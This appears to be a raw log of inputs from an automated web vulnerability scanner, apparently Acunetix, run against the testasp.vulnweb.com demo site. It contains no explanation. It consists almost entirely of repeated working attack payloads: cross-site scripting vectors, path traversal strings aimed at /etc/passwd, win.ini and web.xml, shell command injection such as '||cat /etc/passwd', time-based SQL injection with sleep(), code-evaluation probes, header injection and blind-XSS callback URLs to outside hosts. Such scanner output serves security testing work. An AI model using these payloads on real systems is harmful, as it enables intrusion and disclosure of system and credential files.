!(()&&!|*|*|

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(946650)</sCripT>

1

'"()

8OZWAcv8'

testasp.vulnweb.com

^(#$!@#$)(()))******

1

1&lt

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1

1

5bg4pjNi')

<img acu onmouseover=prompt(954927) //>

'

'

/etc/passwd

1

1

1

1

1

viC6QOTQ'))

1<input autofocus onfocus=prompt(941818)>

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

<a href='http://www.acunetix.com'>website security</a>

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

1

1

1

-1)

[url=http://www.acunetix.com]website security[/url]

acunetix_wvs_invalid_filename

................etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

http://hitfO0OnMu0Sb.bxss.me/

1

1

comments

1_bjo2W <ScRiPt >prompt(994063)</ScRiPt>

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

1

1

1

comments

1

baCCLNe9'

1

"&dir&"

1

1

1

gBX54tDV')

comments/.

http://www.acunetix.tst

'"

1'"()&%<ScRiPt >prompt(902106)</ScRiPt>

|dir

1

1

8snGhSJ5'))

1

1

<!--

file:///etc/passwd

'"()&%<ScRiPt >prompt(925387)</ScRiPt>

1

1

1

1

'|dir

1

1

1_926793

"|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

acu10212<s1﹥s2ʺs3ʹuca10212

1

1

acux2274z1z2abcxuca2274

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(957632)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(973989)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(979354)</ScRiPt>

1

windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929948></ScRiPt>

1

1

................windowswin.ini

1<ScRiPt >prompt(935722)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(964280)">

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(975871)"></g></svg>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<div style=width:expression(prompt(970626))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

1

1<body onload=prompt(953828)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(949658)>

1

1

1

1<img src=xyz OnErRor=prompt(940301)>

WEB-INF/web.xml

1<img/src=">" onerror=alert(922414)>

1

WEB-INF\web.xml

1

1<ScRiPt%20>prompt(992064)</sCripT>

1&lt

1

1

<img acu onmouseover=prompt(968004) //>

1

1

1<input autofocus onfocus=prompt(949918)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_NsUXC <ScRiPt >prompt(914744)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9456712*9645750)

1

1

&cat /etc/passwd&

'+response.write(9456712*9645750)+'

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9456712*9645750)+"

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

`cat /etc/passwd`

1

1

${100196+99154}

1

../../../../../../../../../../etc/passwd.jpg

1

|cat /etc/passwd#

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n925408=v970640

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

-1)

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

1

-1))

!(()&&!|*|*|

'"()

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

WWSE9B9i'

1

^(#$!@#$)(()))******

1

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

DTuXUkjB')

1

1

'

1

"

1

YMu3Bl6W'))

/etc/passwd

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

${@print(md5(acunetix_wvs_security_test))}

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

1

http://hit1R5CA9TF5B.bxss.me/

acunetix_wvs_invalid_filename

&dir

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

eA4llJVx'

1

'&dir&'

................etc/passwd

ANTfJ4W8')

comments

'"

1

1'"()&%<ScRiPt >prompt(995543)</ScRiPt>

1

"&dir&"

'"()&%<ScRiPt >prompt(907341)</ScRiPt>

1

comments/.

Szj8ZWbH'))

<!--

1_936605

|dir

1

1

1

file:///etc/passwd

1

'|dir

1

1

"|dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

WEB-INF/web.xml

1

1

acu2561<s1﹥s2ʺs3ʹuca2561

WEB-INF\web.xml

1

acux4662z1z2abcxuca4662

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(904843)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1<script>prompt(975024)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(924147)</ScRiPt>

1

1

windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?964096></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(932118)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(935893)">

response.write(9170910*9055429)

1

1

&cat /etc/passwd&

/.\./.\./.\./.\./.\./.\./windows/win.ini

'+response.write(9170910*9055429)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(924949)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9170910*9055429)+"

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(920931))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

1<iframe src='data:text/html

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

1

1<body onload=prompt(949821)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954503)>

`cat /etc/passwd`

${100240+100170}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1&n977414=v987195

1

1<img src=xyz OnErRor=prompt(983241)>

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1<img/src=">" onerror=alert(991229)>

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

-1))

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(956669)</sCripT>

testasp.vulnweb.com

"|"ld

.\./.\./.\./.\./.\./.\./etc/passwd

oOkawHnu'

'"()

1

^(#$!@#$)(()))******

1

1

/etc/passwd

1&lt

JX2wn062')

'

1

1

1

1

1

1

pVAkqCSX'))

<img acu onmouseover=prompt(958592) //>

'

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

1

-1

1<input autofocus onfocus=prompt(902997)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

acunetix_wvs_invalid_filename

1

-1)

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

................etc/passwd

||cat /etc/passwd

http://hitnFlzJ1VmmT.bxss.me/

1

comments

-1))

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments

&dir

1

bi60tIH3'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

1_8SHsb <ScRiPt >prompt(970446)</ScRiPt>

comments/.

'&dir&'

file:///etc/passwd

'"

pivXM3vZ')

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

<!--

1

1

Hc83bJll'))

1

1

|dir

1

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(921594)</ScRiPt>

1

1

1

WEB-INF\web.xml

'|dir

1

1

'"()&%<ScRiPt >prompt(993930)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1_988224

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

windowswin.ini

1

1

................windowswin.ini

1

1

1

acu8285<s1﹥s2ʺs3ʹuca8285

..\..\..\..\..\..\..\..\windows\win.ini

1

acux1822z1z2abcxuca1822

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt >prompt(936362)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<script>prompt(983329)</script>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(955626)</ScRiPt>

response.write(9286850*9202970)

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936034></ScRiPt>

'+response.write(9286850*9202970)+'

WEB-INF/web.xml

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt >prompt(931886)</ScRiPt>

1

"+response.write(9286850*9202970)+"

1

'&cat /etc/passwd&'

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(996623)">

1

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(974218)"></g></svg>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

1<div style=width:expression(prompt(980272))>

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

${99104+99683}

1

1<iframe src='data:text/html

-1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

|cat /etc/passwd#

1<body onload=prompt(924852)>

-1)

1&n966584=v944789

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(928722)>

)

1

'|'ld

-1))

1

1some_inexistent_file_with_long_name%00.jpg

1

1<img src=xyz OnErRor=prompt(963399)>

'"()

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

!(()&&!|*|*|

UMgl0RxW'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<img/src=">" onerror=alert(979684)>

1

QVSdrQ2c')

^(#$!@#$)(()))******

.\./.\./.\./.\./.\./.\./etc/passwd

1

'

1

testasp.vulnweb.com

1

1<ScRiPt%20>prompt(945192)</sCripT>

no2sxN6v'))

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

"

1

1

-1

"

1&lt

1

1

1

1

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

1

<img acu onmouseover=prompt(971469) //>

1

1

comments

||cat /etc/passwd

http://hitP4N5PbPEzR.bxss.me/

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1<input autofocus onfocus=prompt(992466)>

comments

1

1

1

1

&dir

ANpcC3Uz'

1

................etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments/.

<a href='http://www.acunetix.com'>website security</a>

1

http://www.acunetix.tst

TRsQ3CQN')

'"

'&dir&'

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

LOREHMby'))

<!--

1'"()&%<ScRiPt >prompt(987130)</ScRiPt>

1

1_LbZJd <ScRiPt >prompt(944160)</ScRiPt>

1

"&dir&"

1

1

'"()&%<ScRiPt >prompt(924972)</ScRiPt>

1

1

1

|dir

file:///etc/passwd

1

1

1_984022

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

"|dir

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

acu4547<s1﹥s2ʺs3ʹuca4547

1

1

1

acux4456z1z2abcxuca4456

../../../../../../../../../../windows/win.ini.jpg

1

1

1

windowswin.ini

1

1<ScRiPt >prompt(918140)</ScRiPt>

1

1

................windowswin.ini

1

1<script>prompt(919433)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(984278)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995998></ScRiPt>

1

1

1

response.write(9297971*9680777)

1<ScRiPt >prompt(957351)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

&cat /etc/passwd&

1

1<video><source onerror="javascript:prompt(999713)">

SomeCustomInjectedHeader:injected_by_wvs

1

'+response.write(9297971*9680777)+'

1

../../../../../../../../../../etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(958690)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9297971*9680777)+"

1<div style=width:expression(prompt(938519))>

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

cat /etc/passwd

1<iframe src='data:text/html

1

${99120+100449}

1

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF/web.xml

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<body onload=prompt(964066)>

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF\web.xml

1

1

1

1some_inexistent_file_with_long_name%00.jpg

-1

1&n917058=v934866

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918001)>

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1

1<img src=xyz OnErRor=prompt(922450)>

'|'ld

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

testasp.vulnweb.com

1

-1))

"|"ld

1<img/src=">" onerror=alert(919624)>

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

^(#$!@#$)(()))******

1

1

IjyXsIK3'

'

1<ScRiPt%20>prompt(910278)</sCripT>

1

1

1

1

/etc/passwd

1

5V9wXEeg')

"

'

1&lt

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

c1gBQtRL'))

1

${@print(md5(acunetix_wvs_security_test))}

<img acu onmouseover=prompt(907182) //>

1

1

1

acunetix_wvs_invalid_filename

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1<input autofocus onfocus=prompt(979090)>

http://hitGNqa40Pept.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

1

1

-1)

<a href='http://www.acunetix.com'>website security</a>

&dir

1

1

................etc/passwd

1

comments

-1))

'&dir&'

http://www.acunetix.tst

[url=http://www.acunetix.com]website security[/url]

1

'"

comments/.

vIUjZMYD'

1_1v5g1 <ScRiPt >prompt(949915)</ScRiPt>

1'"()&%<ScRiPt >prompt(978435)</ScRiPt>

"&dir&"

<!--

1

1

file:///etc/passwd

1

1

YIAaFhhh')

1

'"()&%<ScRiPt >prompt(905190)</ScRiPt>

1

|dir

1

1

3sJcxxtM'))

1

1

/\../\../\../\../\../\../\../etc/passwd

1_994873

1

1

1

1

'|dir

1

1

1

WEB-INF/web.xml

1

"|dir

1

1

WEB-INF\web.xml

1

acu4445<s1﹥s2ʺs3ʹuca4445

1

1

../../../../../../../../../../windows/win.ini

acux6203z1z2abcxuca6203

1

1

1

1<ScRiPt >prompt(983733)</ScRiPt>

../../../../../../../../../../boot.ini

1<script>prompt(943771)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(915475)</ScRiPt>

1

windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?999946></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(996750)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(963262)">

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(960033)"></g></svg>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(915905))>

1

response.write(9672113*9984720)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

'+response.write(9672113*9984720)+'

1

&cat /etc/passwd&

1

1<body onload=prompt(927293)>

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9672113*9984720)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(938770)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1

1

1<img src=xyz OnErRor=prompt(914755)>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

1

1<img/src=">" onerror=alert(959322)>

1

1

1

"&cat /etc/passwd&"

WEB-INF\web.xml

1<ScRiPt%20>prompt(917849)</sCripT>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1&lt

1

../../../../../../../../../../etc/passwd.jpg

${99921+99727}

1

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

<img acu onmouseover=prompt(948680) //>

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n931740=v969998

-1)

1

1some_inexistent_file_with_long_name%00.jpg

1

1<input autofocus onfocus=prompt(913082)>

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

<a href='http://www.acunetix.com'>website security</a>

1

1

obw6QGmm'

'|'ld

testasp.vulnweb.com

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1

[url=http://www.acunetix.com]website security[/url]

^(#$!@#$)(()))******

'

5fGVePt1')

1

1

"|"ld

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1_MZMF1 <ScRiPt >prompt(915340)</ScRiPt>

"

xu27kT9z'))

1

1

1

1

1

1

1

/etc/passwd

-1

${@print(md5(acunetix_wvs_security_test))}

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

1

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

"

1

acunetix_wvs_invalid_filename

http://hitN6yjEfxgj0.bxss.me/

1

1

-1))

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://www.acunetix.tst

||cat /etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

hkFyytN8'

comments

'"

&dir

1

1'"()&%<ScRiPt >prompt(987483)</ScRiPt>

1

1

1

'&dir&'

<!--

0fgD989Z')

comments/.

1

................etc/passwd

1

'"()&%<ScRiPt >prompt(987197)</ScRiPt>

1

z8jTzqg6'))

1

"&dir&"

1

1

1_925640

1

1

|dir

file:///etc/passwd

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

1

acu5472<s1﹥s2ʺs3ʹuca5472

../../../../../../../../../../boot.ini

acux10461z1z2abcxuca10461

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(925585)</ScRiPt>

1

windowswin.ini

1

1

1<script>prompt(967877)</script>

1

1<ScRiPt >prompt(960698)</ScRiPt>

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953570></ScRiPt>

1

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(975145)</ScRiPt>

1

response.write(9008704*9551822)

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(974408)">

'+response.write(9008704*9551822)+'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972622)"></g></svg>

1

"+response.write(9008704*9551822)+"

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(998924))>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

WEB-INF/web.xml

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<body onload=prompt(959572)>

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF\web.xml

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900804)>

if(now()=sysdate(),sleep(3.172),0)/*'XOR(if(now()=sysdate(),sleep(3.172),0))OR'"XOR(if(now()=sysdate(),sleep(3.172),0))OR"*/

${100299+99738}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

cat /etc/passwd

1

1

1<img src=xyz OnErRor=prompt(998508)>

(select(0)from(select(sleep(3.172)))v)/*'+(select(0)from(select(sleep(3.172)))v)+'"+(select(0)from(select(sleep(3.172)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1&n924818=v908573

1<img/src=">" onerror=alert(911420)>

-1

1some_inexistent_file_with_long_name%00.jpg

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

|cat /etc/passwd#

1

1

-1)

1

1<ScRiPt%20>prompt(913553)</sCripT>

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

'|'ld

.\./.\./.\./.\./.\./.\./etc/passwd

1&lt

1

'"()

^(#$!@#$)(()))******

testasp.vulnweb.com

1

'

/etc/passwd

"|"ld

Gd9pA1m0'

a7JabrFK'

'"()

1

1&lt

^(#$!@#$)(()))******

testasp.vulnweb.com

'

1

"|"ld

/etc/passwd

YLPZcD47')

'"()

1

1&lt

^(#$!@#$)(()))******

testasp.vulnweb.com

'

1

"|"ld

jnv1DNVk')

/etc/passwd

LmTBrEgH'))

'"()

1

1&lt

^(#$!@#$)(()))******

testasp.vulnweb.com

'

1

"|"ld

/etc/passwd

Bx8QnOBs'))

1

1

<img acu onmouseover=prompt(980840) //>

1

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

EKcflcCW'))

-1

1

1

<img acu onmouseover=prompt(980840) //>

1

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

1

<img acu onmouseover=prompt(980840) //>

1

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

-1

1

1

<img acu onmouseover=prompt(980840) //>

1

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<input autofocus onfocus=prompt(990112)>

1

${@print(md5(acunetix_wvs_security_test))}

1

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<input autofocus onfocus=prompt(990112)>

1

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}\

"

................etc/passwd

1

1

1

1

1

-1))

acunetix_wvs_invalid_filename

http://hitF2ZPAawI3M.bxss.me/

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<a href='http://www.acunetix.com'>website security</a>

1

1

3Ts3E2XC'

||cat /etc/passwd

comments

1

1

file:///etc/passwd

1

i3an7qKK')

1

1

'"

comments

http://www.acunetix.tst

&dir

<!--

1'"()&%<ScRiPt >prompt(971653)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

e4OGVphG'))

1

comments/.

[url=http://www.acunetix.com]website security[/url]

1

'&dir&'

WEB-INF/web.xml

1

1

1

'"()&%<ScRiPt >prompt(988923)</ScRiPt>

1

1

"&dir&"

1

1_9aDoH <ScRiPt >prompt(942567)</ScRiPt>

WEB-INF\web.xml

1_932035

1

|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

"|dir

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

windowswin.ini

1

1

................windowswin.ini

1

1

acu10013<s1﹥s2ʺs3ʹuca10013

1

acux7529z1z2abcxuca7529

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(961443)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<script>prompt(915381)</script>

1

1

1<ScRiPt >prompt(930019)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

